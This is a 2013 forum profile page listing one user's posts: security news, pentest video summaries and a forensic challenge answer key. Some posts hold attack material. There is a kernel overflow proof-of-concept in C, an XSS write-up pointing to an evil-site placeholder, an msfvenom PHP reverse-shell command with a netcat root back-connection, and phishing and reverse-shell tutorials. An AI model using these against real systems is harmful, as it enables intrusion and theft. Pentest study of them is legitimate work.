Kwelwild

Active Members
  • Posts: 638
  • Days Won: 1

Everything posted by Kwelwild

  1. About SQLidot
     Name: SQLidot
     Description: SQL Injection/Vulnerability Tool
     Coder: Kwelwild
     Design: Sykandar Full Theme
     Theme Credits: Aeonhack, Mavamaarten, Support™
     Made in: Romania, Europe
     Date/Hour: 13-March-2013@21:15 PM
     Options:
       - SQL Injection Scanner
       - SQL Injection (3 Methods): Blind SQLi, Error Based, Bypass
       - Find Admin (Login Page)
       - All Encrypt/Decrypt
       - 2 Subdomain Scanners
     Images: Scanner, SQL Injection, Find Admin, Encrypt-Decrypt, Subdomain Scanner
     Information:
     Virus Scan: Screenshot - NovirusThanks
     Download Link(s): UppIT.com, GirlShare
  2. Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow

         #include <stdio.h>
         #include <string.h>
         #include <netinet/in.h>
         #include <sys/socket.h>

         #define SCTP_GET_ASSOC_STATS 112
         #define SOL_SCTP 132

         int main(void)
         {
             /* Option value handed to getsockopt(); its length is taken from strlen() below. */
             char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
             socklen_t len = strlen(buf);
             int fd;

             fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
             getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
             return 0;
         }

     Source: Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow
  3. Google will replace all your passwords in the future. How it wants to secure your accounts

     This is good news for the ladies and "WTF?" news for the gentlemen. And rightly so. Google intends to change all internet users' passwords and simplify them so that everything is more at hand. Literally. Business Insider writes that Google and a few guys from MIT are preparing a luxury replacement for passwords: the ring. Worn on the finger, it would work wirelessly and do away with the message "enter your password to log in". For now it sounds like SF, but Google Glasses sounded the same a few years ago. Business Insider, however, dots the i in this case: "It all sounds perfect... just don't lose your ring".

     Source: Google will replace all your passwords in the future. How it wants to secure your accounts - www.yoda.ro
  4. The "Like" button on Facebook reveals many things about the internet users who use it, especially information about their race, age and sexual orientation, but also their political sympathies and even their IQ. The authors of this study, published on Monday in the United States of America, devised algorithms that make it possible to build a personality profile revealing personal and intimate information about Facebook users. These mathematical models are 88% accurate regarding men's sexuality and 95% accurate when it comes to distinguishing between white and Black people in the United States. Christians and Muslims were correctly identified in 82% of all cases. The same algorithms could also be extrapolated to information that allows the deduction of sexual orientation, whether the user takes drugs and whether their parents are divorced. This data can be exploited for commercial purposes to organize well-targeted advertising and marketing campaigns, but it can also reveal extremely personal information, says David Stillwell of the University of Cambridge in the United Kingdom, one of the authors of this study, published in Proceedings of the National Academy of Sciences (PNAS). The same information can be obtained using other digital data from online search engines, e-mail and mobile phones. For this study, the British researchers examined 8,000 Facebook users in the United States who volunteered to use the "Like" button, to provide information for building a demographic profile and to take part in psychometric tests. The predictions rely largely on inferences made from a huge amount of data.

     Thus, a user's homosexual orientation is inferred not because they visit gay sites, but from their musical preferences and the TV shows they watch. People with a high IQ most often like political satire shows or classic American films such as "To Kill a Mockingbird" and "The Godfather". Users with a low IQ prefer the Harley Davidson brand and Bret Michaels, lead singer of the rock band Poison, very popular in the '80s, say the authors of this study.

     Source: Study: The Facebook "Like" button reveals a great deal of information about users
  5. Description: In this video Jack Crook talks about Digital Forensics and the DFIR Challenge for GrrCon 2012. He will show us how to solve the GrrCon 2012 Challenge using different tools.

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

     Source: Digital Forensics And Incident Response
  6. Description: Penetration Test pWnOS v2.0 with BurpSuite

     More info on: Penetration Test pWnOS v2.0 with BurpSuite | Security is just an Illusion

     Source: Penetration Test Pwnos V2.0 With Burpsuite
  7. PM Sent!
  8. Google Fusion Tables suffers from a cross site scripting vulnerability.

     # Title: Google Fusion Tables XSS (HTML Injection) Vulnerability
     # Release Date: 07/03/2013
     # Author: Junaid Hussain - [ illSecure Research Group ]
     # Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com
     # Vulnerable Application: https://www.google.com/fusiontables/DataSource?dsrcid=implicit

     //##### Process:
     1. go to https://www.google.com/fusiontables/DataSource?dsrcid=implicit
     2. Click "Create empty table" and then click "Next"
     3. Click the drop down menu on the Cards1 tab
     4. Select "Change Card Layout" and then go to the Custom Tab
     5. Remove the HTML code and add the following code into the box:
        <A HREF="http://EVIL_SITE_HERE.COM"><h1>Click here to continue</h1></A>
     6. Click save & then Click the share button (top right) and make the link public
     7. Click the drop down menu on the Cards1 tab and select the Publish Option
     8. Send the Publish Link to victim.

     //##### Proof Of Concept:
     PoC: https://www.google.com/fusiontables/embedviz?viz=CARD&q=select+*+from+19VGTDJasS8NJlbbqnsiDFA_qH7Q95e2dTOKd5RU&tmplt=1&cpr=2
     Video: http://www.youtube.com/watch?v=OMCJQ8Atkek&feature=youtu.be

     Contact: illSecResearchGroup@gmail.com - Junaid Hussain
     http://www.illsecure.com

     Original: http://www.illsecure.com/2013/03/exclusive-google-fusion-tables-xss-html.html

     Source: Google Fusion Tables Cross Site Scripting ≈ Packet Storm
  9. OFF: A little longer and this topic will have more views than the one with Polonic. ON: Welcome.
  10. Description: Penetration Test pWnOS v2.0 with Sqlmap

      More info on: Penetration Test pWnOS v2.0 with Sqlmap | Security is just an Illusion

      Source: Penetration Test Pwnos V2.0 With Sqlmap
  11. http://www.youtube.com/watch?feature=player_embedded&v=l1YIiOVe6wA

      Description: CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.

      CMS Explorer currently supports module/theme discovery with the following products: Drupal, Wordpress, Joomla!, Mambo
      And exploration of the following products: Drupal, Wordpress

      Download link - Downloads - cms-explorer - CMS Explorer - Discover the CMS components behind the site - Google Project Hosting

      Original Source: https://www.youtube.com/watch?v=l1YIiOVe6wA
      Source: Cms-Explorer Tool In Backtrack 5 R3
  12. Description: Hey my friends today I made a small tutorial on rooting a web server using metasploit. I hope you know to create metasploit backdoor executables. Here we use the same theory but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC we use a reverse connection. So the parameter should be like this.

          msfvenom -p php/meterpreter_reverse_tcp LHOST=[ local IP ] LPORT=[Local Port ] -f raw

      We need a raw output so we use the format as raw. Now our php meterpreter reverse connection is created but you have to delete the ‘#’ character at the line 1 to run this script correctly. Okay now run msfconsole and use exploit/multi/handler with the LHOST and LPORT and exploit. Here in this video I have used msfcli which is the same but has advanced features automation features of metasploit. By now our framework should start listening. Next upload our php script to the server and load it. Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands as our payload is in php, hence we have limited meterpreter commands. Now run shell and there you go.

      As usual the normal procedure of compiling a local root exploit and executing can be done here. But in this example my kernel is 2.6.24-16 so I will use Linux 2.6 Udev Local Privilege Escalation Exploit: Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit. We should run this exploit like this

          ./exploit PID of Udev-1

      Next after successful exploitation our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it just listen using NC and you should get a successful back connection and you are the root.

      Un0wn_X
      Thank You.

      Source: Rooting A Server Using Metasploit Back Connection
  13. Description: In this video you will learn how to analyze a malicious PDF file using PDFStreamDumper.

      PDF Stream Dumper: This is a free tool for the analysis of malicious PDF documents. It also has some features that can make it useful for pdf vulnerability development. This tool has been made possible through the use of a mountain of open source code. Thank you to all of the authors involved. Has specialized tools for dealing with obfuscated javascript, low level pdf headers and objects, and shellcode. In terms of shellcode analysis, it has an integrated interface for libemu sctest, an updated build of iDefense sclog, and a shellcode_2_exe feature.

      RE Corner

      Source: Pdf Analysis With Pdf Stream Dumper
  14. "USA, land of the surveilled, country of the logged": Testimony of an Anonymous member who fled because he was being hunted by the Government

      In recent years, the hackers of Anonymous have gained a huge amount of sympathy from internet users, but through their illegal actions they have also become internationally wanted. In an interview given to Asher Wolf, an American activist, the hacker "American Anon" describes what life in exile means for him and the fear of being caught at any second by the authorities. From exile, he says: "The idea of leaving came to me the moment I saw the others doing it too." "Given that at this moment the NSA is building spying machine programs for every citizen, I don't criticize anyone who wants to leave America - the land of the surveilled, the country of the logged." He also spoke about the death of Aaron Swartz, the man who brought Reddit into the world and who took his own life at only 26: "He was exhausted, he was afraid, he was unsure of his situation, because he was being persecuted, and the prosecutors had already managed to squeeze him for money."
  15. http://www.youtube.com/watch?feature=player_embedded&v=XF8IMJFnsMw

      Description: Hello! This tutorial shows you how to interact with Exploit Pack. Exploit Pack is an extremely useful tool for testing purposes on high performance networks, it is also the only professional solution that is freely available. Exploit Pack is being actively developed with frequent releases and daily updates and has an ever growing list of features, Exploit Pack is a community effort backed by a dedicated group of people: Everyone is encouraged to contribute while ensures the products always meets professional quality criteria. For more info please visit: Exploit Pack - Security tools

      Original Source: [Exploit Pack] - Tutorial, how to use! - YouTube
      Source: [Exploit Pack] - Tutorial, How To Use!
  16. PM Sent!
  17. http://www.youtube.com/watch?feature=player_embedded&v=FUmNZC4WCEo

      Description: In this video I will show you how to create a custom html template for phishing attack – if any website is not asking for any logging details so using this template you can ask for the Username and Password. Same attack you can perform on a social network sites and for more advanced attack you can perform a MITM.

      Original Source: Using SET Credential Harvester On a Site With No Login Form - YouTube
      Source: Using Set Credential Harvester On A Site With No Login Form
  18. Description: In this video I will show you how to perform a Brute-Force Attack on a Windows System for Admin Password and using that password we are going to exploit the windows 7 system, so I’m going to use PSEXEC Metasploit Module for Custom Exe Exploitation.

      Source: Metasploit Psexec
  19. Description: In this video I will show you how to upload PHP Reverse shell on a web server.

      PHP Reverse Shell: php-reverse-shell | pentestmonkey

      This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host and port of your choice. Bound to this TCP connection will be a shell.

      Source: Upload Php Reverse Shell On A Web Server
  20. Description: In this video I will show you how to solve Jackcr's forensic challenge using Volatility Framework.

      1. Who delivered the attack?
         "Security Department"
      2. Who was the attack delivered to?
         amirs@petro-market.org
         callb@petro-market.org
         wrightd@petro-market.org
      3. What time was the attack delivered?
         Mon, 26 Nov 2012 14:00:08 -0600 via phishing email.
      4. What time was the attack executed?
         By the user callb on machine ENG-USTXHOU-148:
           Downloaded at Mon, 26 Nov 2012 23:01:53 UTC
           Executed at Mon, 26 Nov 2012 23:01:54 UTC (from IE history fragment, verified with timeline and prefetch entry)
         By the user amirs on machine FLD-SARIYADH-43:
           Downloaded at unknown (Visited: fragment in memory without timestamp)
           Executed at Tue, 27 Nov 2012 00:17:58 UTC (timeline and prefetch entry)
      5. What is the C2 IP Address?
         58.64.132.141
      6. What is the name of the dropper?
         Symantec-1.43-1.exe
      7. What is the name of the backdoor?
         Gh0st
      8. What is the process name the backdoor is running in?
         svchost.exe via the injected DLL 6to4ex.dll
      9. What is the process id on all the machines the backdoor is installed on?
         ENG-USTXHOU-148 PID 1024
         FLD-SARIYADH-43 PID 1032
      10. What usernames were used in this attack?
          callb (password Mar1ners@4655)
          sysbackup (password T1g3rsL10n5)
      11. What level of access did the attacker have?
          Local Administrator (via sysbackup account)
      12. How was lateral movement performed?
          cmd.exe executed via PSEXEC from ENG-USTXHOU-148 to IIS-SARIYADH-03
          PSEXEC was attempted against DC-USTXHOU but was not successful.
      13. What .bat scripts were placed on the machines?
          FLD-SARIYADH-43: system1.bat system2.bat system3.bat system4.bat system5.bat system6.bat
          ENG-USTXHOU-148: system5.bat
          IIS-SARIYADH-03: system1.bat system4.bat system5.bat
      14. What are the contents of each .bat script?
          system1.bat – make the c:\windows\webui directory and share it as “Z” granting the sysbackup user full permissions.
          System2.bat – execute gs.exe and output to c:\windows\webui\svchost.dll
          system3.bat – perform a recursive directory listing of c:\*.dwg and write output to c:\windows\webui\https.dll
          system4.bat – using winrar, compress the contents of “C:\Engineering\Designs\Pumps\*.dwg” excluding *.dll, writing the resulting rar archive into c:\WINDOWS\webui\netstat.dll using the password hclllsddlsdiddklljh.
          system5.bat - copies wc.exe from the c:\windows\webui\ directory into the c:\windows\system32\ directory and creates an AT task to execute it at various times.
          system6.bat – execute various system utilities to gather information on the network.
      15. What other tools were placed on the machines by the attacker?
          PSEXEC (ps.exe)
          Windows Credentials Editor (wc.exe)
          WinRAR (ra.exe)
          ScanLine (sl.exe)
          gsecdump (gs.exe)
      16. What directory was used by the attacker to drop tools?
          C:\WINDOWS\webui
      17. Was the directory newly created or was it there prior to the attack?
          Newly created for the attack
      18. What were the names of the exfiltrated files?
          netuse.dll system.dll svchost.dll netstat.dll https.dll
      19. What did the exfiltrated files contain?
          netuse.dll – output of various commands executed on ENG-USTXHOU-148 - hashes included
          system.dll – output of various commands executed on IIS-SARIYADH-03 - no hashes included
          svchost.dll – output of hash dumping commands on IIS-SARIYADH-03
          https.dll – directory listing of C:\Engineering\Designs\Pumps from IIS-SARIYADH-03
          netstat.dll – RAR file
      20. What time did winrar run?
          Tue Nov 27 2012 01:11:19 UTC
      21. What is the md5sum of pump1.dwg?
          a48266248c04b2ba733238a480690a1c
      22. Which machines were compromised and need to be remediated?
          ENG-USTSXHOU-148
          FLD-SARIYADH-43
          IIS-SARIYADH-03
      23. Which user accounts were compromised and need to be remediated?
          callb
          sysbackup
          saadmin
      24. Are there additional machines that need to be analyzed?
          No.
      25. Describe how each machine was involved
          PDF: - file:///C:/Users/Administrator/Downloads/Jackcr+Forensic+Challenge+report+-+ver2-20121202-BN.pdf

      Source: Jackcr's Forensic Challenge Solutions With Volatility Framework
  21. Google announces that the US administration is monitoring thousands of Internet accounts

      US government agencies, including the federal police (FBI), monitored thousands of Internet accounts from 2009 to 2012 in order to prevent possible terrorist activities, the American giant Google has announced. This week Google made public the alleged "national security" letters it received, which correspond to official requests for data made under the anti-terrorism Patriot Act, adopted after the attacks of 11 September 2001. This is the first time a private company has published data about these letters, which are heavily criticized by human rights organizations. From 2009 to 2012, the company received between zero and 999 requests from the administration. These requests target between 1,000 and 1,999 accounts annually, with the exception of 2010, when the requests targeted between 2,000 and 2,999 accounts, according to Google. "Note that we publish ranges of figures and not exact figures. This is in order to respond to the requests of the FBI, the Department of Justice and other (government) agencies, which fear that publishing exact figures would reveal information about ongoing investigations," explained Google's director of security, Richard Salgado, on the group's blog. Associations such as the ACLU (American Civil Liberties Union) consider that these letters give too much power to the administration, which can thus monitor Internet accounts without a court warrant. The Electronic Frontier Foundation (EFF) in turn considers that these letters are "dangerous" because they generate a "systematic abuse of power" by the FBI. "This is an unprecedented victory for transparency," two EFF activists, Dan Auerbach and Eva Galperin, said on a blog on Wednesday.

      Despite the non-publication of precise data, "Google allows some light to be shed on the way the US administration uses secret requests for user data," they say. "Although we remain in the fog regarding the scale and the manner in which the law is applied, these new data eliminate fears (...) of generalized access to accounts - at least to those of Google," they added.

      Source: Google announces that the US administration is monitoring thousands of Internet accounts
  22. Description: Tutorial: OWASP Bricks Login page #2

      Source: Owasp Bricks - How To Solve Challenge #4: Log In Page #2
  23. Description: In this video I will show you how to use Perl Reverse Shell for unix system. This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PERL. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host and port of your choice. Bound to this TCP connection will be a shell.

      Perl Reverse Shell: http://pentestmonkey.net/tools/perl-reverse-shell/perl-reverse-shell-1.0.tar.gz

      Source: Web Perl Reverse Shell
  24. http://www.youtube.com/watch?feature=player_embedded&v=jjRaS5p7GN0

      Description: Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

      https://github.com/stephenfewer/ReflectiveDLLInjection

      Original Source: https://www.youtube.com/watch?v=jjRaS5p7GN0
      Source: Reflective Dll Injection Metasploit Module